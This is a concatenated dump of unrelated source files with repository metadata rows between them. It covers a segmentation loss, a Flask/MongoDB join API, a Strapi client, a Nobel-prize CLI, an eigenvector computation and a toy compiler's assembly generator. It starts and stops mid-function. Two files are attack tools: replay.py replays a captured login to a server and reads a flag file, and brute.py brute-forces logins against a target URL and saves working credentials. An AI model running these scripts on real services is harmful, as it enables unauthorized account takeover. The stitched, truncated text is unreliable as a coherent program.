pred = F.softmax(pred, dim=1)
num_classes = pred.shape[1]
one_hot_target = F.one_hot(
torch.clamp(target.long(), 0, num_classes - 1),
num_classes=num_classes
)
valid_mask = (target != ignore_index).long()
loss = self.loss_weight * tversky_loss(
pred,
one_hot_target,
valid_mask=valid_mask,
alpha=self.alpha,
beta=self.beta,
eps=self.eps,
class_weight=class_weight,
reduction=reduction,
avg_factor=avg_factor,
ignore_index=ignore_index,
**kwargs
)
return loss
| 29.074534 | 102 | 0.574877 | 1,931 | 0.412519 | 0 | 0 | 1,957 | 0.418073 | 0 | 0 | 586 | 0.125187 |
17fa046b5f198637f7b0c78962349041958e3fcc | 689 | py | Python | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | null | null | null | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | 1 | 2015-12-03T06:16:53.000Z | 2015-12-03T06:16:53.000Z | replay.py | Plummy-Panda/MITM-V | 1b920d42267b02817e0dc2274dd13a415ba79e98 | [
"MIT"
] | null | null | null | import socket
import config
def main():
# get the login info, which is extracted from the packet
f = open('data/msg.txt', 'r')
msg = f.read()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (config.HOST, config.PORT)
print 'connecting to %s port %s' % server_address
sock.connect(server_address)
sock.sendall(msg) # replay login message
sock.sendall('ls\r\n') # to list the file
sock.sendall('cat flag1\r\n') # to get flag1
# send login
while True:
data = sock.recv(1024)
if data:
print data
print 'Close the socket!'
sock.close()
if __name__ == '__main__':
main()
| 22.966667 | 60 | 0.625544 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 217 | 0.314949 |
17fa9c27681a820d868dd4675d7bac62973724aa | 424 | py | Python | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | 1 | 2016-09-14T16:33:03.000Z | 2016-09-14T16:33:03.000Z | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | null | null | null | sim.py | julieisdead/jtwitter-simulator | 933340a5a7aab9a229e4e4d28088169f58f99dbe | [
"MIT"
] | null | null | null | import jtweeter
access_token = "TWITTER_APP_ACCESS_TOKEN"
access_token_secret = "TWITTER_APP_ACCESS_TOKEN_SECRET"
consumer_key = "TWITTER_APP_CONSUMER_KEY"
consumer_secret = "TWITTER_APP_CONSUMER_SECRET"
user_id = 000000000 #user id of twitter user to simulate.
def main():
jtweeter.tweet(access_token, access_token_secret, consumer_key, consumer_secret, user_id)
if __name__ == '__main__':
main() | 32.615385 | 94 | 0.778302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 162 | 0.382075 |
17fb4e69ff797bf18a8170242cc925a7284334e8 | 4,899 | wsgi | Python | backend/api/user/join.wsgi | pstrinkle/popflip-image-stream | 6cf1fe649ac53a91d913d1cf47cd9ec2f22765db | [
"Apache-2.0"
] | null | null | null | backend/api/user/join.wsgi | pstrinkle/popflip-image-stream | 6cf1fe649ac53a91d913d1cf47cd9ec2f22765db | [
"Apache-2.0"
] | null | null | null | backend/api/user/join.wsgi | pstrinkle/popflip-image-stream | 6cf1fe649ac53a91d913d1cf47cd9ec2f22765db | [
"Apache-2.0"
] | null | null | null | """Join API Handler."""
from pymongo import Connection
from pymongo.errors import InvalidId
from bson.objectid import ObjectId
from cgi import escape
from urlparse import parse_qs
from json import dumps
from urllib import unquote
POST_REQUIRED_PARAMS = ("user", "community",)
MAX_COMMUNITIES = 25
# XXX: Move into neato library.
def string_from_interwebs(input_value):
"""Given a string from the query dictionary string thing; make it clean."""
return escape(unquote(input_value))
# db.users.update({"_id" : ObjectId("4ffb168d5e358e377900000a")},
# { $set : {"watched" : 0} },
# false,
# false)
def update_involved(user, connection):
"""Increment the communities value for the user."""
database = connection['test']
collection = database['users']
collection.update({"_id" : ObjectId(user)},
{"$inc" : {"communities" : 1}})
return
def check_duplicate_community(user, community, connection):
"""User is the user id string and community will be the array."""
database = connection['test']
collection = database['communities']
try:
post = collection.find_one({"$and" : [{"user" : ObjectId(user)},
{"community" : community}]})
except InvalidId:
post = None
if post is None:
return False
return True
# XXX: Using separate connections may just be stupid and slow.
def check_count(user, connection):
"""Given an author id, check to make sure it has fewer than MAX watches."""
database = connection['test']
collection = database['users']
post = collection.find_one({"_id" : ObjectId(user)})
if post["communities"] >= MAX_COMMUNITIES:
return True
return False
# XXX: Use this information with check_count()
def verify_author(user, connection):
"""Given an author id, check it."""
database = connection['test']
collection = database['users']
try:
post_a = collection.find_one({"_id" : ObjectId(user)})
except InvalidId:
post_a = None
if post_a is None:
return False
return True
def handle_new_community(post_data):
"""Add new community to database if input is correct."""
# likely throws an exception on parse error.
query_dict = parse_qs(post_data, keep_blank_values=True)
for required in POST_REQUIRED_PARAMS:
if required not in query_dict:
return None
user = string_from_interwebs(query_dict.get("user")[0]).strip()
community = string_from_interwebs(query_dict.get("community")[0]).strip()
# temporary
split_tags = [string_from_interwebs(tag).strip() for tag in community.split(",")]
# XXX: Need to search each tag for illegal characters and also check the
# string length.
if len(split_tags) > 2:
return None
if split_tags[0] == split_tags[1]:
return None
with Connection('localhost', 27017) as connection:
if not verify_author(user, connection):
return None
if check_count(user, connection):
return None
if check_duplicate_community(user, split_tags, connection):
return None
comm_link = {"user" : ObjectId(user), "community" : split_tags}
database = connection['test']
collection = database['communities']
# need to wrap with try, except
entry = collection.insert(comm_link)
update_involved(user, connection)
return {"id" : str(entry)}
def bad_request(start_response):
"""Just does the same thing, over and over -- returns bad results.."""
output_len = 0
start_response('400 Bad Request',
[('Content-type', 'text/html'),
('Content-Length', str(output_len))])
def application(environ, start_response):
"""wsgi entry point."""
output = []
outtype = "application/json"
if environ['REQUEST_METHOD'] == 'GET':
bad_request(start_response)
return output
# this simplifies parameter parsing.
if environ['CONTENT_TYPE'] == 'application/x-www-form-urlencoded':
try:
content_length = int(environ['CONTENT_LENGTH'])
except ValueError:
content_length = 0
# show form data as received by POST:
post_data = environ['wsgi.input'].read(content_length)
entry = handle_new_community(post_data)
if entry is None:
bad_request(start_response)
return output
output.append(dumps(entry, indent=4))
# send results
output_len = sum(len(line) for line in output)
start_response('200 OK',
[('Content-type', outtype),
('Content-Length', str(output_len))])
return output
| 28.649123 | 85 | 0.62176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,460 | 0.29802 |
17ff2992920f5d3aa7bc1487f1b72ff34fcce309 | 1,040 | py | Python | nobeldb/cli.py | ionrock/nobeldb | d8d59c8b8f9c2a2acd4a046f642f2f2021255a40 | [
"BSD-3-Clause"
] | null | null | null | nobeldb/cli.py | ionrock/nobeldb | d8d59c8b8f9c2a2acd4a046f642f2f2021255a40 | [
"BSD-3-Clause"
] | null | null | null | nobeldb/cli.py | ionrock/nobeldb | d8d59c8b8f9c2a2acd4a046f642f2f2021255a40 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import csv
import pkg_resources
import textwrap
import click
from tabulate import tabulate
default_data = pkg_resources.resource_filename('nobeldb', 'data/nobel.csv')
def reader(fh):
rows = csv.DictReader(fh)
for row in rows:
yield {k: v.decode('latin-1') for k, v in row.iteritems()}
@click.command()
@click.argument('needle')
@click.option('--db', '-d', default=default_data, type=click.File('rb'))
def main(needle, db):
rows = []
cols = ['Year', 'Name', 'Category', 'Motivation']
for winner in reader(db):
if winner['Name'].lower().startswith(needle.lower()):
row = [winner['Year'], winner['Name'], winner['Category']]
motivation = textwrap.wrap(winner['Motivation'], 30)
row.append(motivation[0])
rows.append(row)
for chunk in motivation[1:]:
rows.append(['', '', '', chunk])
rows.append(['', '', '', ''])
click.echo(tabulate(rows))
if __name__ == '__main__':
main()
| 24.186047 | 75 | 0.590385 | 0 | 0 | 133 | 0.127885 | 667 | 0.641346 | 0 | 0 | 177 | 0.170192 |
aa002b09eecbf2efa6db3d5394d8eb8190eee611 | 2,359 | py | Python | gnome/global_eigenvector/script.py | imlegend19/MDSN-DevRank | bb1b71f72d2fb97044a62e8e0152dadb88de6411 | [
"MIT"
] | null | null | null | gnome/global_eigenvector/script.py | imlegend19/MDSN-DevRank | bb1b71f72d2fb97044a62e8e0152dadb88de6411 | [
"MIT"
] | null | null | null | gnome/global_eigenvector/script.py | imlegend19/MDSN-DevRank | bb1b71f72d2fb97044a62e8e0152dadb88de6411 | [
"MIT"
] | null | null | null | import pickle
import numpy as np
def fetch_file(path):
with open(path, 'rb') as fp:
return pickle.load(fp)
def fetch_adj_mat(column):
if column == 0:
return A1
elif column == 1:
return A2
elif column == 2:
return A3
# elif column == 3:
# return A4
print("Fetching files...")
A1 = np.array(
fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
A2 = np.array(
fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
A3 = np.array(
fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/adjacency_matrix_normal/definition_2/A1_fc.txt"))
# A4 = np.array(fetch_file(RELATIVE_PATH + ADJACENCY_MATRIX + "A4_fc.txt"))
influence_matrix = np.array(fetch_file(
"/home/imlegend19/PycharmProjects/Research - Data Mining/gnome/influence_matrix_normal/definition_2/"
"influence_matrix_fc.txt"))
print(influence_matrix.shape)
krp = []
for i in range(3):
wa1 = A1 * influence_matrix[i][0]
wa2 = A2 * influence_matrix[i][1]
wa3 = A3 * influence_matrix[i][2]
# wa4 = A4 * influence_matrix_normal[i][3]
print(influence_matrix[i][0])
print(influence_matrix[i][1])
print(influence_matrix[i][2])
# print(influence_matrix_normal[i][3])
for j in range(1134):
row = []
row.extend(wa1[j])
row.extend(wa2[j])
row.extend(wa3[j])
# row.extend(wa4[j])
krp.append(row)
print("Clearing variables...")
A1 = None
A2 = None
A3 = None
# A4 = None
influence_matrix = None
print("Setting up kr_product...")
kr_product = np.array(krp, dtype=np.float)
krp.clear()
print(kr_product.shape)
print(kr_product)
print("Calculating eigenvector...")
e = np.linalg.eig(kr_product)
e_val = e[0]
e_vec = e[1]
ind = list(e_val).index(max(e_val))
print(ind)
pev = e_vec[ind] / np.linalg.norm(e_vec[ind])
print(pev.shape)
print(pev)
print(sum(map(lambda x: x.real * x.real, pev)))
print("Saving eigenvector...")
with open("global_eigenvector_fc.txt", 'wb') as fp:
pickle.dump(pev, fp)
print("Saving eigenvalues...")
with open("eigenvalue_" + str(ind) + "_fc.txt", "wb") as fp:
pickle.dump(e_val[ind], fp)
print("Process finished!")
| 23.59 | 120 | 0.666808 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 898 | 0.38067 |
aa027855d06ebca0a52e37c857218b627bb34991 | 2,066 | py | Python | brute.py | mirfansulaiman/python-bruteforce-script | bc1d7d92de37fa927c2fc4ddc1d1ef08ad361a26 | [
"Apache-2.0"
] | 1 | 2018-07-14T01:00:56.000Z | 2018-07-14T01:00:56.000Z | brute.py | mirfansulaiman/python-bruteforce-script | bc1d7d92de37fa927c2fc4ddc1d1ef08ad361a26 | [
"Apache-2.0"
] | null | null | null | brute.py | mirfansulaiman/python-bruteforce-script | bc1d7d92de37fa927c2fc4ddc1d1ef08ad361a26 | [
"Apache-2.0"
] | 1 | 2021-01-31T06:53:55.000Z | 2021-01-31T06:53:55.000Z | #!/usr/bin/env python
# Name : Simple Bruteforce v.0.1
# Author: mirfansulaiman
# Indonesian Backtrack Team | Kurawa In Disorder
# http://indonesianbacktrack.or.id
# http://mirfansulaiman.com/
# http://ctfs.me/
#
# have a bug? report to doctorgombal@gmail.com or PM at http://indonesianbacktrack.or.id/forum/user-10440.html
#
# Note : This tool for education only.
# Dont change author name !
import requests
import re
from random import randint, choice
from string import ascii_uppercase
import string, sys, os, time
RED = "\033[1;31;40m"
WHITE = "\033[1;37;40m"
GREEN = "\033[1;32;40m"
CYAN = "\033[1;36;40m"
PURPLE = "\033[1;35;40m"
TAG = "\033[0m"
def main():
count = 0
No = 20000
a = 30000
while No <= a:
url = "http://target.com"
Username = No
Password = No
payload = {
"login":"login",
"password":Password,
"username":Username,
}
headers = {}
timeout = 15
response = requests.request("POST", url, data=payload, headers=headers)
time.sleep(0.5)
count = count + 1
No = No + 1
print "------------------------------------"
print "{0}NO{1} : {2} | {3}[BRUTEFORCE]{4}".format(WHITE, TAG, count, RED, TAG)
print "{0}SEND{1} : {2}{3}{4} | {5}{6}{7} ".format(WHITE, TAG, CYAN, Username, TAG, PURPLE, Password, TAG)
gagal = re.search('Login ke Akun Anda', response.text)
result = re.search('Selamat Datang', response.text)
if result:
print "{0}STATUS{1} : {2}LOGIN SUCCESS{3}".format(WHITE,TAG,GREEN,TAG)
f = open("result2.txt", "a")
f.write("{0}:{1}\n".format(Username,Password))
f.close()
elif gagal:
print "{0}STATUS{1} : {2}LOGIN FAIL{3}".format(WHITE,TAG,RED,TAG)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print ' [Exit]'
try:
sys.exit(0)
except SystemExit:
os._exit(0) | 31.784615 | 114 | 0.549371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 789 | 0.381897 |
aa02c1541983ffc2ca4760a8ccd065899eae8b79 | 2,826 | py | Python | flask_strapi/__init__.py | ToraNova/flask-strapi | d777604326785c278137d1f4306978cf4192bf2f | [
"MIT"
] | 1 | 2022-01-08T23:48:17.000Z | 2022-01-08T23:48:17.000Z | flask_strapi/__init__.py | ToraNova/flask-strapi | d777604326785c278137d1f4306978cf4192bf2f | [
"MIT"
] | null | null | null | flask_strapi/__init__.py | ToraNova/flask-strapi | d777604326785c278137d1f4306978cf4192bf2f | [
"MIT"
] | null | null | null | import requests
import sys, traceback
from flask import session, abort
from werkzeug.local import LocalProxy
from functools import wraps
strapi_session = LocalProxy(lambda: _get_strapi_session())
null_session = LocalProxy(lambda: _get_null_session())
def clear_strapi_session():
_pop_strapi_session()
def _get_strapi_session():
return session.get('strapi') if session.get('strapi') else null_session
def _get_null_session():
return {'jwt': None, 'user': {}}
def _set_strapi_session(res):
j = res.json()
session['strapi'] = j
def _pop_strapi_session():
session.pop('strapi', None)
def authentication_required(fn):
@wraps(fn)
def decorated_view(*args, **kwargs):
if strapi_session.get('jwt') is None:
abort(401)
return fn(*args, **kwargs)
return decorated_view
class Strapi:
def __init__(self, url_base, login_path):
self.url_base = url_base
self.login_path = login_path
def request(self, path, method='get', **kwargs):
'''
request(path, method='get/post/put/delete', body={})
returns a request result (python-requests)
'''
_method = method.lower()
hdrs = {}
if 'headers' in kwargs:
hdrs = kwargs.pop('headers')
if isinstance(strapi_session.get('jwt'), str):
jwt = strapi_session.get('jwt')
if 'Authorization' not in hdrs:
hdrs['Authorization'] = f'Bearer {jwt}'
url = f'{self.url_base}{path}'
try:
if _method in ['post', 'put', 'delete']:
res = getattr(requests, _method)(url, headers=hdrs, **kwargs)
else:
# default to get request
res = requests.get(url, headers=hdrs, **kwargs)
return res
except requests.exceptions.ConnectionError:
raise requests.exceptions.ConnectionError('ConnectionError: connection to strapi cms failed')
except requests.exceptions.Timeout:
raise requests.exceptions.ConnectionError('Timeout: timeout error on request to strapi cms')
def authenticate(self, username, password):
'''
authenticate(username, password)
returns True if successfuly, False otherwise
'''
res = self.request(self.login_path, method='post', json={'identifier': username, 'password': password})
if res.status_code == 200:
_set_strapi_session(res)
return None
return res
class StrapiV3(Strapi):
def __init__(self, url_base = 'http://localhost:1337', login_path='/auth/local'):
super.__init__(url_base, login_path)
class StrapiV4(Strapi):
def __init__(self, url_base = 'http://localhost:1337', login_path='/api/auth/local'):
super.__init__(url_base, login_path)
| 31.752809 | 111 | 0.635527 | 1,990 | 0.704176 | 0 | 0 | 155 | 0.054848 | 0 | 0 | 632 | 0.223638 |
aa02cc1bd489b4bbbc4791b094845a1485411324 | 20,228 | py | Python | code_generation.py | irinaid/MAlice | 02740d661020866c3927b9ee7ee4523aaaafcb7e | [
"MIT"
] | 1 | 2021-04-25T22:53:36.000Z | 2021-04-25T22:53:36.000Z | code_generation.py | irinaid/MAlice | 02740d661020866c3927b9ee7ee4523aaaafcb7e | [
"MIT"
] | null | null | null | code_generation.py | irinaid/MAlice | 02740d661020866c3927b9ee7ee4523aaaafcb7e | [
"MIT"
] | null | null | null | from sys import stdout
from evaluate_expression import *
from operations_and_expressions import *
from write import *
regs = ["r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]
relational_ops = [ ">", ">=", "<", "<=", "!=", "=="]
allocationTable = {}
globalTable = {}
stack = []
BYTE_SIZE = 8
IF_NUMBER = 0
WHILE_NUMBER = 0
program = []
functions = []
PART = 0
STRING_COUNT = 0
# Starts generating the assembly code.
def generate(tree, filePath):
global stack
global program
global regs
global printf
global scanf
global PART
tree = cleanList(tree)
stopPoint = 0
while (tree[stopPoint][0] == "DECL"):
globalDecl(tree[stopPoint])
stopPoint += 1
if (tree[0] == "MAINF"):
tree = [tree]
for i in range(stopPoint, len(tree)):
branch = tree[i]
key = branch[0]
if (key == "MAINF"):
PART = 0
genMain(branch)
elif (key == "VOIDF"):
PART = 1
genVoid(branch)
elif (key == "TYPEF"):
PART = 1
genType(branch)
writeToFile(filePath)
# Generates the main function.
def genMain(tree):
global PART
PART = 0
block = tree[4][1]
stack.append("__main_")
write("main:\n")
genBlock(block)
PART = 0
write("\tret\n")
stack.pop()
#Generates the code for a void function or an inner void/main (hatta) function
def genVoid(tree):
global PART
PART = 1
if (tree[0] == "MAINF"):
block = tree[4][1]
args = tree[2]
name = "hatta"
else:
block = tree[5][1]
args = tree[3]
name = tree[1]
stack.append("__" + name + "_")
write("\n_" + name + ":\n")
write("\tpush rbp\n")
write("\tmov rbp, rsp\n")
if (len(args) > 0):
getFunctionArgs(tree)
genBlock(block)
stack.pop()
write("\tpop rbp\n")
write("\tret\n")
PART = 0
# Generates instructions equivalent to a type function
def genType(tree):
global PART
global BYTE_SIZE
global regs
PART = 1
stack.append("__" + tree[1] + "_")
write("_"+tree[1]+":\n")
args = tree[3]
if (len(args) > 0):
getFunctionArgs(tree)
block = tree[7][1]
genBlock(block)
write("\tpop rbp\n")
write("\tret\n")
stack.pop()
PART = 0
# Gets the arguments of a function and places them in registers
def getFunctionArgs(tree):
args = tree[3]
if (not type(args[0]) is list):
args = [(args)]
write("\tpush rbp\n")
write("\tmov rbp, rsp\n")
rbp_count = len(args)*BYTE_SIZE + BYTE_SIZE
prefix = "__" + tree[1] + "_"
for arg in args:
aux_reg = regs.pop()
var = prefix + arg[1]
allocationTable.update({var:("[rbp+"+
str(rbp_count)+"]", arg[2])})
rbp_count -= BYTE_SIZE
# Assigns a value to a local variable.
def genAssign(tree):
global stack
global allocationTable
global regs
global STRING_COUNT
# If it's a global variable, we need an extra mov
if (tree[1] in globalTable and
getScopePlusVar(tree[1]) == tree[1]):
reg = regs.pop()
writeMov(reg,
genExpr(tree[2], getRegisterInScope(tree[1])))
writeMov(getRegisterInScope(tree[1]), reg)
else:
# If the value is a string, declare it in the data section
if (isString(cleanToFirstValue(tree[2]))):
comp = getRegisterInScope(tree[1])
if (not comp in allocationTable or comp != comp.__getitem__(0)):
value = cleanToFirstValue(tree[2])[1:-1]
writeToDataSection("\t"+tree[1]+" dd `"+
str(value)+"`,0\n")
writeMov(getRegisterInScope(tree[1]), tree[1])
return
value = cleanToFirstValue(tree[2])[1:-1]
writeToDataSection("\t"+tree[1]+" dd `"+
str(value)+"`,0\n")
if (getRegisterInScope(tree[1]) == ""):
reg = tree[1]
writeMov(regs.pop(), tree[1])
else:
reg = getRegisterInScope(tree[1])
writeMov(regs.pop(), getRegisterInScope(tree[1]))
# If it's a char or int, just put it in a register directly
else:
reg = getRegisterInScope(tree[1])
value = genExpr(tree[2], reg)
if (reg != value):
writeMov(reg, value)
# Allocates a register to the new variable by inserting it in the
# table with the given name in scope.
# If the declaration also includes assignment, evaluate the
# expression and assign it.
def genDecl(tree):
global stack
global allocationTable
global regs
varName = getAllStack() + tree[1]
regName = regs.pop()
typeVar = tree[2]
allocationTable.update({varName:(regName, typeVar)})
if (len(tree) == 5):
genAssign(["ASSIGN", tree[1], tree[4]])
return regName
# Global variables
def globalDecl(tree):
global allocationTable
global globalTable
if (tree[2] == "STRING"):
allocationTable.update({tree[1]:(tree[1], tree[2])})
if (len(tree) == 3):
if (not tree[1] in allocationTable and
tree[1] != allocationTable[tree[1]].__getitem__(0)):
genAssign(["ASSIGN", tree[1], "0"])
else:
genAssign(["ASSIGN", tree[1], tree[4]])
return
writeToDataSection("\t" + tree[1] + " dd")
writeToDataSection(" 0\n")
allocationTable.update({tree[1]:("["+tree[1]+"]", tree[2])})
globalTable.update({tree[1]:(0, tree[2])})
if (len(tree) > 3):
genAssign(["ASSIGN", tree[1], tree[4]])
# Generates a block of code into assembly code.
def genBlock(tree):
global regs
global stack
global allocationTable
if (not type(tree[0]) is list):
tree = [tree]
for t in tree:
if(t[0] == "OPEN"):
stack.append("_scope_")
genBlock(t[1])
stack.pop()
if(t[0] == "DECL"):
genDecl(t)
elif(t[0] == "ASSIGN"):
genAssign(t)
elif(t[0] == "IF"):
genIf(t)
elif(t[0] == "WHILE"):
genWhile(t)
elif(t[0] == "PRINT"):
genPrint(t)
elif(t[0] == "RET"):
genRet(t)
elif(t[0] == "DEC" or t[0] == "INC"):
genIncDec(t)
elif(t[0] == "READ"):
genRead(t)
elif(t[0] == "FULLSTOP"):
continue
elif(t[0] == "MAINF"):
stack.append("__hatta_")
genVoid(t)
stack.pop()
elif(t[0] == "TYPEF"):
stack.append("__" + t[1] + "_")
genType(t)
stack.pop()
elif(t[0] == "VOIDF"):
stack.append("__" + t[1] + "_")
genVoid(t)
stack.pop()
elif(t[1] == "LPAREN" and type(t[2]) is list and
t[3] == "RPAREN" and (not (t[0] == "IF"))
and (not (t[0] == "WHILE"))):
genFunctionCall(t)
# Print function in assembly.
def genPrint(tree):
global allocationTable
global regs
global stack
global STRING_COUNT
value = tree[1]
varStart = ""
printType = ""
# If we want to print a function call
if (type(tree[1]) is list and len(tree[1]) == 4 and
tree[1][1] == "LPAREN" and tree[1][3] == "RPAREN"):
genFunctionCall(tree[1])
reg = regs.pop()
writeMov(reg, "rax")
varStart = reg
printType = "writeInt"
regs.append(reg)
# If we want to print a value directly
elif (getRegisterInScope(cleanToFirstValue(value)) == ""
and isValue(value)):
# Special case for printing a string
if (isString(cleanToFirstValue(value))):
value = cleanToFirstValue(tree[1])[1:-1]
writeToDataSection("\ts"+str(STRING_COUNT)+" dd `"+
str(value)+"`, 0\n")
allocationTable.update({"s"+str(STRING_COUNT):(value, "STRING")})
varStart = "s"+str(STRING_COUNT)
printType = getPrintType("STRING")
STRING_COUNT += 1
else:
varStart = cleanToFirstValue(value)
printType = getPrintType(value)
# If we want to print a variable content
elif (len(value) == 1 and
getRegisterInScope(cleanToFirstValue(value)) != ""):
value = getScopePlusVar(value)
printType = allocationTable[value].__getitem__(1)
printType = getPrintType(printType)
varStart = getRegisterInScope(value)
elif (len(value) > 1):
# Multiple cases, should use genExpr
varStart = genExpr(value, varStart)
printType = "writeInt"
writeMov("rax", "0")
writeMov("rsi", varStart)
writeMov("rdi", printType)
write("\tcall printf\n")
def genRet(tree):
global regs
# If the function returns a negative variable
if (type(tree[1]) is list and tree[1][0] == "-"):
tree[1] = genExpr(tree[1], "rax")
negate(tree[1], "rax")
# If the function returns not value
elif (type(tree[1]) is list and tree[1][0] == "~"):
reg = regs.pop()
writeMov(reg, getRegisterInScope(tree[1][1]))
write("\tnot " + reg + "\n")
writeMov("rax", reg)
regs.append(reg)
else:
tree = cleanList(tree)
# If the function returns
if (len(tree) > 1):
to_return = getScopePlusVar(tree[1])
if (to_return != ""):
to_return = allocationTable[to_return]
to_return = to_return.__getitem__(0)
if (to_return[0] == "["):
aux_reg = regs.pop()
writeMov(aux_reg,to_return)
to_return = aux_reg
regs.append(aux_reg)
else:
to_return = tree[1]
writeMov("rax", to_return)
# Reads input using gcc function scanf
def genRead(tree):
global STRING_COUNT
var = getScopePlusVar(tree[1])
scanType = allocationTable[var].__getitem__(1)
reg = allocationTable[var].__getitem__(0)
write("\txor rax, rax\n")
writeMov("rdi", getPrintType(scanType))
pointer = "s" + str(STRING_COUNT)
writeToDataSection("\t" + pointer + " db 0\n")
writeMov("rsi", pointer)
write("\tcall scanf\n")
writeMov("rbx", "[" + pointer + "]")
writeMov(reg, "rbx")
STRING_COUNT += 1
# Generates the operations to calculate the value of an expression
def genExpr(tree, startVar):
global regs
if (startVar == ""):
startVar = regs.pop()
if (len(tree) == 1):
if (isValue(tree)):
return cleanToFirstValue(tree)
elif (len(tree) == 2):
reg = getRegisterInScope(cleanToFirstValue(tree[1]))
if (reg == ""):
reg = cleanToFirstValue(tree[1])
if (tree[0] == "~"):
writeMov(startVar, reg)
write("\tnot ", startVar, "\n")
return startVar
elif(tree[0] == "-"):
writeMov(startVar, reg)
write("\tneg ", startVar, "\n")
return startVar
#solve subExpressions of current expression
#and replace the variables with their values
for i in range(len(tree)):
if (len(tree[i]) > 1):
newStartVar = regs.pop()
tree[i] = genExpr(tree[i], newStartVar)
else:
#!!This if below might cause trouble, it should actually
#check that tree[i] is not an operand
if (i%2 == 0):
#If I have a value in my expression, e.g. x + 2
if (isValue(tree[i])):
tree[i] = cleanToFirstValue(tree[i])
else:
tree[i] = getRegisterInScope(tree[i])
#solve this expression
writeMov(startVar, tree[0])
while (len(tree) >= 3):
writeOp(startVar, tree[1], tree[2])
tree = tree[2:]
return startVar
# Inc, Dec
def genIncDec(tree):
global allocationTable
if(tree[0] == "DEC"):
op = "dec"
else:
op = "inc"
write("\t", op, " ",
allocationTable[getScopePlusVar(tree[1])].__getitem__(0), "\n")
# Generates a function call
def genFunctionCall(tree):
global BYTE_SIZE
args = tree[2]
if (len(args) == 1):
args = [args]
if (len(args) == 0):
write("\tcall _" + tree[0] + "\n")
else:
for arg in args:
var = getScopePlusVar(arg)
# If argument is a variable
if (var != ""):
var = allocationTable[var].__getitem__(0)
# If it's a value
else:
arg = cleanToFirstValue(arg)
declTree = ["DECL", cleanToFirstValue(arg)]
if (isString(arg)):
declTree.append('STRING')
elif (isChar(arg)):
declTree.append('CHAR')
else:
declTree.append('INT')
var = genDecl(declTree)
write("\tpush " + var + "\n")
write("\tcall _" + tree[0] + "\n")
write("\tadd rsp, " + str(BYTE_SIZE*len(args)) + "\n")
#Put in a variable the negative value of it
def negate(tree, startVar):
#Check tree is well formed
if (len(tree) == 2 and tree[0] == '-'):
sign = tree[0]
variable = tree[1][0]
#If the value is already in a register
reg = getScopePlusVar(tree[1])
if (reg != ""):
writeMov(startVar, reg)
write("\tneg ", startVar, "\n")
#Else put the value in the register and negate it
else:
writeMov(startVar, tree[1][0])
write("\tneg ", startVar, "\n")
################# IF, WHILE ######################
#Generates a while loop in assembly.
def genWhile(tree):
global WHILENUMBER
WHILENUMBER += 1
whileNumber = str(WHILENUMBER)
write("while",whileNumber, ":\n")
#Genetars the condition.
genBoolExpr(tree[2])
#Jumps at the end of while is it doesn't
write("endWhile",whileNumber,"\n")
#Generates the body of the while loop.
genBlock(tree[4])
#Writes the label for the end of the loop.
write("\nendWhile",whileNumber,":\n")
#IF 1 1
def genIf2(tree, ifNumber):
global regs
global IF_NUMBER
IF_NUMBER += 1
y = str(IF_NUMBER)
write("\nif", y, ":\n")
if(tree[0] == "ELSE"):
genBlock(tree[1])
elif(tree[0] == "ELSE_IF"):
genBoolExpr(tree[2])
if(tree[6] != "ENDIF"):
#IF NOT TRUE. JUMP NEXT IF
y = str(IF_NUMBER + 1)
write("if", y , "\n")
else:
#If not true, jump endIf
write("endIf", ifNumber)
genBlock(tree[5])
#IF TRUE, JUMP ENDIF
write("\n\tjmp endIf", ifNumber, "\n")
if(tree[6] != "ENDIF"):
genIf2(tree[7:], ifNumber)
#Generates boolean expressions if the initial condition is too complex.
def genBoolExpr2(tree):
global relational_ops
global IF_NUMBER
global regs
ifNumber = str(IF_NUMBER)
IF_NUMBER += IF_NUMBER
write("\ncond", ifNumber, ":\n")
#If the three has length 3 and the second element is a relational operator
if(len(tree) == 3 and tree[1] in relational_ops):
varStart1 = regs.pop()
genExpr(tree[0], getAllStack(), varStart1)
varStart2 = regs.pop()
genExpr(tree[2], getAllStack(), varStart2)
write("\n\tcmp ",varStart1, ", ", varStart2,"\n")
write("\tset",getSet(tree[1]), " al")
#Restore the registers used
regs.append(varStart1)
regs.append(varStart2)
elif(len(tree) > 1):
if(tree[1] == "&&"):
genBoolExpr2(tree[0])
register = regs.pop()
write("\n\tmovzx ",register ,", al\n")
write("\tcmp ", register, ", 1\n")
#If the condition is false, then jump at the end of
#the condition with al = 0.
write("\n\tjne endCond", ifNumber , "\n")
#Restore the register used
regs.append(register)
genBoolExpr2(tree[2:])
elif(tree[1] == "||"):
genBoolExpr2(tree[0])
register = regs.pop()
write("\n\tmovzx ",register, ", al\n")
write("\tcmp ", register, ", 1\n")
#If the condition is true, then jump at the end of
#the condition with al = 1.
write("\n\tje endCond", ifNumber, "\n")
#Restore the register used
regs.append(register)
genBoolExpr2(tree[2:])
elif(tree[0] == "!"):
genBoolExpr2(tree[1:])
register = regs.pop()
write("\n\tmovzx ",register, ", al\n")
write("not ", register)
write("cmp ", register, ", 1")
write("\n\tjne endCond", ifNumber , "\n")
#Restore the register used
regs.append(register)
write("\nendCond",ifNumber, ":\n")
#Generates a boolean expression.
def genBoolExpr(tree):
global relational_ops
global IF_NUMBER
global regs
#If the three has length 3 and the second element is a relational operator
if(len(tree) == 3 and tree[1] in relational_ops):
varStart1 = regs.pop()
